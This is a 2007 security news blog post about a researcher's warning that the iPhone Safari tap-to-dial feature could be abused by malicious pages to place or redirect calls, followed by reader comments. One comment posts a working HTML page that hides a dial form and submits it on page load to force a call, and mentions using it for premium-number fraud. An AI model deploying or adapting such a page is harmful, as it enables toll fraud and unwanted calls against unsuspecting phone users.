- Innovation, regulation and research on tap at RSA 2008
- Researchers uncover 100 VoIP vulnerabilities
- Badware not pushing users offline
- Web attacks won't stop
- Most sites still hack-able
- Tips on employee monitoring
- Research: IT security maturing, but misaligned
- Clarke sharply criticizes Bush cyber-security plans
- Conference seeks to bridge risk, research
- Core finds new CEO
July 16, 2007 | Comments: (0)
Researchers point to iPhone security risk
Security researchers with Web application testing specialists SPI Dynamics are drawing attention to a feature on Apple's hot new iPhone that they say could be subverted by hackers to attack users of the device and potentially monitor their phone calls.
In a blog posted to the security company's Web site on July 16, SPI security researcher Billy Hoffman proposes that a feature in the device's Safari browser that allows iPhone users to dial any phone number displayed on the browser by touching the digits on-screen could soon be subverted by hackers.
If capable of luring iPhone users to malware sites or legitimate sites infected with cross-site scripting attacks, Hoffman said, attackers could infect the devices with spyware that could allow them to track calls, redirect calls placed by a user, place unauthorized calls from the browser, program the device to make repeated calls for an infinite amount of time, or prevent the phones from calling at all.
As an example of the manner in which schemers could make money off the ruse, Hoffman said that attackers could use the technique to place batches of calls to toll 900 numbers they control.
The researcher with SPI (which was recently acquired by HP) said that the issue was reported to Apple on July 6, however, the iPhone maker has yet to address the issue in any form of public statement.
Apple representatives didn't immediately respond to calls seeking comment on the issue.
"SPI Labs [is] working with Apple to remediate the problems. However, [we] recognize the unique urgency of these issues and the large number of people that could be affected," Hoffman wrote. "As such, SPI Labs recommends that iPhone users do not use the built-in Safari browser to dial telephone numbers until Apple resolves these issues."
Posted by Matt Hines on July 16, 2007 03:28 PM
RATE THIS ARTICLE:
-
- COMMENTS
I don't want to say that this doesn't seem like a real problem because I don't know enough about it... but I'm pretty sure that the ability to call and the ability to surf with Safari, although connected by this feature, probably can't be accessed via some web application.
There are certain things that simply can't be hacked yet on the iPhone and they probably won't be. Currently, there's no easy way of compromising the Mac OS X Operating System unless someone goes out of their way to do so.
As for a lack of response to this issue, let's imagine that you just made a (arguably) great piece of technology. Everyone makes articles about tiny problems all day. The media tries to destroy it as well as they can. You get a bunch of e-mails and calls all day every day because people want you to make statements based on (arguably) nothing in particular.
You've got meetings to make and a business to run. Who cares about someone's made up threat? Supposed experts are just giving hackers ideas that won't work anyway.
Posted by: K. Mitchell at July 16, 2007 05:43 PMI discovered this myself 2 days after the release of the iphone. Was even thinking of setting up a 900 number for iDummies. Below is just one variant
[html]
[head]
[title]Iphone Autodial[/title]
[script type="text/javascript"]
function autoClick()
{
var dial=document.getElementById('dial');
dial.click();
}
[/script]
[/head]
[body onload="autoClick();"]
[form method="GET" action="tel:1-312-555-5555"]
[input type="submit" id="dial" value="dial" style="display:none"/]
[/form]
[/body]
[/html]
K. Mitchell, yes you should have stopped in the first line. It was the only one that made sense. And if you believe for one second some security expert is blowing smoke in that the iphone can't be exploited through it's *Fully Featured* web-browser... please... And just so you know, there is nothing safe about the mini OS 10 they shoe-horned into the device. And you were right, you don't know enough about the subject.
Posted by: 1337 at July 17, 2007 10:01 AM| ZERO DAY PODCAST |
| Listen to the latest podcast: |
MP3
•
•
•
Archive
•
![[VoiceIndigo Mobilize - Listen to podcasts on your mobile phone]](http://www.voiceindigo.com/ht/images/mobilize_logo_sm.gif){kind=logo}
|
TOP STORIES
ADDITIONAL RESOURCES
- Remote Access: Maintain Security and Decrease the Burden on IT
- Beyond AntiVirus: Symantec Endpoint Protection
- What Every Enterprise Needs to Know About VDI
- Disaster Recovery in Minutes
- Protecting Microsoft(R) Applications
- Reduce Recovery Times and Tape Costs
